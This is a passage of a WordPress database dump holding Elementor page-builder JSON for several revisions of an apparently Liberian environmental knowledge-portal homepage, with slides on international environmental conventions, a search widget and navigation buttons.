"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\"}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\"}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\"}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(27055,3936,'_elementor_version','3.4.0'),(27056,3936,'_elementor_template_type','wp-page'),(27057,3936,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(27059,3936,'_elementor_pro_version','3.3.6'),(27061,3937,'_wp_page_template','default'),(27062,3937,'_elementor_edit_mode','builder'),(27063,3937,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_cbd.jpg\",\"id\":209,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_marine.jpg\",\"id\":210,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"3d86158\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/slide_ccd.jpg\",\"id\":211,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\"}],\"slides_height\":{\"unit\":\"px\",\"size\":370,\"sizes\":[]},\"content_animation\":\"fadeInLeft\"},\"elements\":[],\"widgetType\":\"slides\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3832980\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"height\":\"min-height\",\"custom_height\":{\"unit\":\"px\",\"size\":120,\"sizes\":[]},\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8ce7e10\"}],\"background_background\":\"classic\",\"background_color\":\"#0A3C1173\",\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"f8bb5a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"db42395\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a3ddb70\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"ecc2093\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":12.237},\"elements\":[],\"isInner\":true},{\"id\":\"73e3c60\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":77.08},\"elements\":[{\"id\":\"f4a4a39\",\"elType\":\"widget\",\"settings\":{\"search_placeholder_text\":\"Search Knowledge Resources...\",\"show_search_category_list\":\"yes\",\"search_category_select_placeholder\":\"Entire Resource\",\"results_counter_text\":\"Results\",\"full_results_btn_text\":\"See all results\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c6a37ad\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c698fbe\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"negative_search\":\"Sorry, but nothing matched your search terms.\",\"server_error\":\"Sorry, but we cannot handle your search query now. Please, try again later!\",\"search_submit_bg_color\":\"rgba(0,100,0,0.86)\",\"search_category_color\":\"#000000\",\"search_taxonomy\":\"resource_category\",\"search_source\":[\"document\",\"institution\",\"mea_resource\",\"project_resource\",\"related_topic\"]},\"elements\":[],\"widgetType\":\"jet-ajax-search\"}],\"isInner\":true},{\"id\":\"e733e70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":10.347},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3b467af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"4a9f59c\"}],\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"40\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"fb58b71\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f8f4095\",\"elType\":\"widget\",\"settings\":{\"title\":\"Select a Topic\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62059d5\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"cc6fadf\",\"elType\":\"widget\",\"settings\":{\"min_height\":{\"unit\":\"px\",\"size\":450,\"sizes\":[]},\"show_terms\":\"\",\"show_terms_num\":\"2\",\"excerpt_length\":\"\",\"excerpt_trimmed_ending\":\"...\",\"show_date\":\"\",\"post_type\":\"related_topic\",\"custom_query_by\":\"ids\",\"post_ids\":\"468,470,473,474,487\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"5b2266b\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"76431bc\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"boxes_gap\":{\"unit\":\"px\",\"size\":5,\"sizes\":[]},\"boxes_title_color\":\"#ffffff\",\"boxes_title_color_hover\":\"#006400\",\"boxes_title_typography_typography\":\"custom\",\"boxes_title_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"boxes_title_typography_font_weight\":\"900\",\"boxes_title_alignment\":\"left\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-tiles\"},{\"id\":\"724fd77\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Topics\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/related-topics\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e8d8c\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/home_4.jpg\",\"id\":258},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5c4a65b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b82855d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}],\"reverse_order_tablet\":\"reverse-tablet\",\"reverse_order_mobile\":\"reverse-mobile\",\"hide_mobile\":\"hidden-phone\"},\"elements\":[{\"id\":\"9b26f8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"8d9d9b1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Institution\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7448ecc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"cdd4f69\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore By Insitution\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/institutions-resources\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2777f6\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0fea759\"}],\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/featured_land_climate.jpg\",\"id\":493},\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"70\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"cc16d03\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"150\",\"isLinked\":false}},\"elements\":[{\"id\":\"b4fc23b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"45201a0\"}]},\"elements\":[{\"id\":\"f419151\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false}},\"elements\":[{\"id\":\"99692db\",\"elType\":\"widget\",\"settings\":{\"title\":\"Explore by Document\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f7b0473\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Explore the EKMS Documents Database.<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"259a529\",\"elType\":\"widget\",\"settings\":{\"text\":\"Explore All Documents\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/documents-database\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8aa33ed\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"db429d4\"}],\"background_background\":\"classic\",\"shape_divider_bottom_width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"shape_divider_bottom_height\":{\"unit\":\"px\",\"size\":82,\"sizes\":[]},\"shape_divider_bottom_flip\":\"yes\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a37cd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"df23907\",\"elType\":\"widget\",\"settings\":{\"title\":\"Latest News & Blogs\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":35,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"339607e\",\"elType\":\"widget\",\"settings\":{\"style\":\"dotted\",\"width\":{\"unit\":\"%\",\"size\":10,\"sizes\":[]},\"align\":\"center\",\"text\":\"Divider\",\"color\":\"#54595f\",\"weight\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"},{\"id\":\"684051a\",\"elType\":\"widget\",\"settings\":{\"number\":4,\"columns\":\"4\",\"equal_height_cols\":\"true\",\"title_trimmed\":\"yes\",\"title_length\":10,\"title_trimmed_ending_text\":\"...\",\"excerpt_length\":10,\"show_terms\":\"yes\",\"show_meta\":\"\",\"show_more\":\"\",\"more_text\":\"Read More\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"537281f\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"821cf97\",\"meta_format\":\"%s\",\"date_format\":\"F j, Y\"}],\"content_bg\":\"rgba(0,100,0,0.59)\",\"content_padding\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"title_color\":\"#ffffff\",\"title_typography_typography\":\"custom\",\"title_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"title_typography_font_weight\":\"900\",\"excerpt_color\":\"rgba(255,255,255,0.75)\",\"excerpt_typography_typography\":\"custom\",\"excerpt_typography_font_size\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"terms_link_typography_typography\":\"custom\",\"terms_link_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"terms_link_bg_color\":\"#6ec1e4\",\"show_author\":\"\",\"show_comments\":\"\",\"arrows\":\"\",\"autoplay\":\"\",\"infinite\":\"\",\"meta_title_related_position\":\"after\",\"meta_content_related_position\":\"after\",\"title_color_hover\":\"#000000\"},\"elements\":[],\"widgetType\":\"jet-posts\"},{\"id\":\"c151e2c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Read All News & Blogs\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/news-and-blogs\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"selected_icon\":{\"value\":\"fas fa-long-arrow-alt-right\",\"library\":\"fa-solid\"},\"icon_align\":\"right\",\"icon_indent\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15,\"sizes\":[]},\"typography_text_transform\":\"uppercase\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#006400\",\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#014421\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d48ccf5\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"37e777c\"}]},\"elements\":[{\"id\":\"0881e40\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"290555e\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"533b1b7\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"a8f2e29\"}],\"background_background\":\"classic\",\"background_color\":\"#000000\",\"padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[{\"id\":\"46a8277\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"2c527f4\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6472317\"}]},\"elements\":[{\"id\":\"39c4f0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(27064,3937,'_elementor_version','3.4.0'),(27065,3937,'_elementor_template_type','wp-page'),(27066,3937,'_elementor_page_settings','a:1:{s:21:\"background_background\";s:7:\"classic\";}'),(27068,3937,'_elementor_pro_version','3.3.6'),(27070,3938,'_wp_page_template','default'),(27071,3938,'_elementor_edit_mode','builder'),(27072,3938,'_elementor_data','[{\"id\":\"c41f68d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"stretch_section\":\"section-stretched\",\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0aa7a91\"}],\"margin\":{\"unit\":\"px\",\"top\":\"-30\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"0b8df2e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2ff14bc\",\"elType\":\"widget\",\"settings\":{\"slides\":[{\"heading\":\"Convention on Biological Diversity \",\"description\":\"CBD is dedicated to promoting sustainable development\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"ef41cbd\",\"horizontal_position\":\"center\",\"vertical_position\":\"middle\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_cbd.jpg\",\"id\":209,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention on Climate Change\",\"description\":\"The ultimate objective of the Convention is to stabilize greenhouse gas concentrations \\\"at a level that would prevent dangerous anthropogenic (human induced) interference with the climate system.\\\"\",\"button_text\":\"Read More\",\"background_color\":\"\",\"_id\":\"11d0065\",\"background_image\":{\"url\":\"https:\\/\\/ekmsliberia.infoliberia.info\\/wp-content\\/uploads\\/2021\\/08\\/featured_marine.jpg\",\"id\":210,\"alt\":\"\",\"source\":\"library\"},\"background_ken_burns\":\"yes\",\"zoom_direction\":\"out\",\"background_overlay\":\"yes\"},{\"heading\":\"Convention to Combat Desertification\",\"description\":\"A sole legally binding international agreement linking environment and development to sustainable land management.\",\"button_text\":\"Read 